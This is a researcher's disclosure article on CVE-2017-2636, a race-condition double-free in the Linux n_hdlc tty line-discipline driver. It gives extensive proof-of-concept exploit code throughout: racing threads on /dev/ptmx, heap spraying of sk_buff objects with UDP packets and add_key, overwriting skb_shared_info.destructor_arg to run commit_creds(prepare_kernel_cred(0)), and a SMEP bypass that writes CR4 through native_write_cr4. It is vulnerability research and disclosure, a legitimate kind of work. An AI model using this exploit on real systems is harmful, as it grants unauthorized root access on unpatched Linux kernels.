This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver. My PoC exploit for x86_64 gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).

This driver (drivers/tty/n_hdlc.c) provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.

Currently the flaw is fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch is backported to the stable kernel versions too.

I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts.

My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy's implementation).

First of all let's watch the demo video!

The n_hdlc bug

Initially, N_HDLC line discipline used a self-made singly linked list for data buffers and had n_hdlc.tbuf pointer for buffer retransmitting after an error. It worked, but the commit be10eb75893 added data flushing and introduced racy access to n_hdlc.tbuf.

After tx error concurrent flush_tx_queue() and n_hdlc_send_frames() both use n_hdlc.tbuf and can put one buffer to tx_free_buf_list twice. That causes an exploitable double-free error in n_hdlc_release(). The data buffers are represented by struct n_hdlc_buf and allocated in the kmalloc-8192 slab cache.

For fixing this bug, I used a standard kernel linked list and got rid of racy n_hdlc.tbuf: in case of tx error the current n_hdlc_buf item is put after the head of tx_buf_list.

I started the investigation when got a suspicious kernel crash from syzkaller. It is a really great project, which helped to fix an impressively big list of bugs in Linux kernel.

Exploitation

This article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings!

Winning the race

Let's look to the code of the main loop: going to race till success.

for (;;) {
	long tmo1 = 0;
	long tmo2 = 0;

	if (loop % 2 == 0)
		tmo1 = loop % MAX_RACE_LAG_USEC;
	else
		tmo2 = loop % MAX_RACE_LAG_USEC;

The loop counter is incremented every iteration, so tmo1 and tmo2 variables are changing too. They are used for making lags in the racing threads, which:

synchronize at the pthread_barrier,
spin the specified number of microseconds in a busy loop,
interact with n_hdlc.

Such a way of colliding threads helps to hit the race condition earlier.

	ptmd = open("/dev/ptmx", O_RDWR);
	if (ptmd < 0) {
		perror("[-] open /dev/ptmx");
		goto end;
	}

	ret = ioctl(ptmd, TIOCSETD, &ldisc);
	if (ret < 0) {
		perror("[-] TIOCSETD");
		goto end;
	}

Here we open a pseudoterminal master and slave pair and set the N_HDLC line discipline for it. For more information about that, see man ptmx, Documentation/serial/tty.txt and this great discussion about pty components.

Setting N_HDLC ldisc for a serial line causes the n_hdlc kernel module autoloading. You can get the same effect using ldattach daemon.

	ret = ioctl(ptmd, TCXONC, TCOOFF);
	if (ret < 0) {
		perror("[-] TCXONC TCOOFF");
		goto end;
	}

	bytes = write(ptmd, buf, TTY_BUF_SZ);
	if (bytes != TTY_BUF_SZ) {
		printf("[-] write to ptmx (bytes)\n");
		goto end;
	}

Here we suspend the pseudoterminal output (see man tty_ioctl) and write one data buffer. The n_hdlc_send_frames() fails to send this buffer and saves its address in n_hdlc.tbuf.

We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:

thread 1: flush the data with ioctl(ptmd, TCFLSH, TCIOFLUSH);
thread 2: start the suspended output with ioctl(ptmd, TCXONC, TCOON).

In a lucky case, they both put the only written buffer pointed by n_hdlc.tbuf to tx_free_buf_list.

Now we return to the CPU 0 and trigger possible double-free error:

	ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
	if (ret != 0) {
		perror("[-] sched_setaffinity");
		goto end;
	}

	ret = close(ptmd);
	if (ret != 0) {
		perror("[-] close /dev/ptmx");
		goto end;
	}

We close the pseudoterminal master. The n_hdlc_release() goes through n_hdlc_buf_list items and frees the kernel memory used for data buffers. Here the possible double-free error happens.

This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree().

The final part of the main loop:

	ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);
	if (ret != EXIT_SUCCESS)
		goto end;

	if (getuid() == 0 && geteuid() == 0) {
		printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n",
						loop, tmo1, tmo2);
		break; /* :) */
	}

	loop++;
}

printf("[+] finish as: uid=0, euid=0, start sh...\n");
run_sh();

Here we try to exploit the double-free error by overwriting struct sk_buff. In case of success, we exit from the main loop and run the root shell in the child process using execve().

Exploiting the sk_buff

As I mentioned, the doubly freed n_hdlc_buf item is allocated in the kmalloc-8192 slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects:

one containing some function pointer,
another one with the controllable payload, which can overwrite that pointer.

Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen sk_buff with its destructor_arg in struct skb_shared_info. This approach is not new – consider reading the cool write-up about CVE-2016-2384.

The network-related buffers in Linux kernel are represented by struct sk_buff. See these great pictures describing sk_buff data layout. The most important for us is that the network data and skb_shared_info are placed in the same kernel memory block pointed by sk_buff.head. So creating a 7500-byte network packet in the userspace will make skb_shared_info be allocated in the kmalloc-8192 slab cache. Exactly like we want.

But there is one challenge: n_hdlc_release() frees 13 n_hdlc_buf items straight away. At first I was trying to do the heap spray in parallel with n_hdlc_release(), but didn't manage to inject the corresponding kmalloc() between the needed kfree() calls. So I used another way: spraying after n_hdlc_release() can give two sk_buff items with the head pointing to the same memory. That's promising.

So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP):

one client socket for sending UDP packets,
one dedicated server socket, which is likely to receive two packets with the same sk_buff.head,
200 server sockets for receiving other packets emitted during heap spray,
200 server sockets for receiving the packets emitted during slab exhaustion.

Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg. We can't use sk_buff.head for that again, because skb_shared_info is placed at the same offset in sk_buff.head and we don't control it. I was really happy to find that add_key syscall is able to allocate the controllable data in the kmalloc-8192 too.

But I became upset when encountered key data quotas in /proc/sys/kernel/keys/ owned by root. The default value of /proc/sys/kernel/keys/maxbytes is 20000. It means that only 2 add_key syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.

But the happiness returned when I encountered the bright idea at the slides of Di Shen from Keen Security Lab: I can make the heap spray successful even if add_key fails!

So, let's look at the init_payload() code:

#define MMAP_ADDR		0x10000lu
#define PAYLOAD_SZ		8100
#define SKB_END_OFFSET		7872
#define KEY_DATA_OFFSET		18

int init_payload(char *p)
{
	struct skb_shared_info *info = (struct skb_shared_info *)(p +
					SKB_END_OFFSET - KEY_DATA_OFFSET);
	struct ubuf_info *uinfo_p = NULL;

The definition of struct skb_shared_info and struct ubuf_info is copied to the exploit code from include/linux/skbuff.h kernel header.

The payload buffer will be passed to add_key as a parameter, and the data which we put there at 7872 - 18 = 7854 byte offset will exactly overwrite skb_shared_info.

	char *area = NULL;
	void *target_addr = (void *)(MMAP_ADDR);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
			MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap\n");
		return EXIT_FAILURE;
	}

	uinfo_p = target_addr;
	uinfo_p->callback = (uint64_t)root_it;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;

The ubuf_info.callback is called in skb_release_data() if skb_shared_info.tx_flags has SKBTX_DEV_ZEROCOPY flag set to 1. In our case, ubuf_info item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.

Anyway, now the callback points to root_it(), which does the classical commit_creds(prepare_kernel_cred(0)). However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.

Heap spraying and stabilization

As I mentioned, n_hdlc_release() frees thirteen n_hdlc_buf items. Our exploit_skb() is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.

Now we are going to perform the use-after-free on sk_buff.data:

receive 4 network packets on the dedicated server socket one by one,
execute several add_key syscalls with our payload after receiving each of them.

The exact number of add_key syscalls giving the best results was found empirically by testing the exploit many times. The example of add_key call:

k[0] = syscall(__NR_add_key, "user", "payload0",
			payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);

If we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:

for (i = 0; i < KEYS_N; i++) {
	if (k[i] > 0)
		syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);
}

Now we need to prepare the heap to the next round of n_hdlc racing. The /proc/slabinfo shows that kmalloc-8192 slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable – send a dozen UDP packets to fill the partially emptied slabs.

SMEP bypass

As I mentioned, the root_it() shellcode resides in the userspace. Executing it in the kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.

There are several approaches to defeat it, for example, Vitaly Nikolenko describes how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn't want to copy it blindly. So I've created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.

In arch/x86/include/asm/special_insns.h I've found this function:

static inline void native_write_cr4(unsigned long val)
{
	printk("wcr4: 0x%lx\n", val);
	asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}

It writes its first argument to CR4.

Now let's look at skb_release_data(), which executes the hijacked callback in the Ring 0:

	if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
		struct ubuf_info *uarg;

		uarg = shinfo->destructor_arg;
		if (uarg->callback)
			uarg->callback(uarg, true);
	}

We see that the destructor callback takes uarg address as the first argument. And we control this address in the exploited sk_buff.

So I've decided to write the address of native_write_cr4() to ubuf_info.callback and put ubuf_info item at the mmap'ed userspace address 0x406e0, which is the correct value of CR4 with disabled SMEP.

In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it's not a problem for this particular exploit since it is fast and reliable.

So let's initialize the payload a bit differently:

	#define CR4_VAL	0x406e0lu

	void *target_addr = (void *)(CR4_VAL & 0xfffff000lu);

	area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
			MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (area != target_addr) {
		perror("[-] mmap\n");
		return EXIT_FAILURE;
	}

	uinfo_p = (struct ubuf_info *)CR4_VAL;
	uinfo_p->callback = NATIVE_WRITE_CR4;

	info->destructor_arg = (uint64_t)uinfo_p;
	info->tx_flags = SKBTX_DEV_ZEROCOPY;

That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise target_addr becomes 0 and mmap() fails, since mapping the zero page is not allowed.

Conclusion

Investigating of CVE-2017-2636 and writing this article was a big fun for me. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.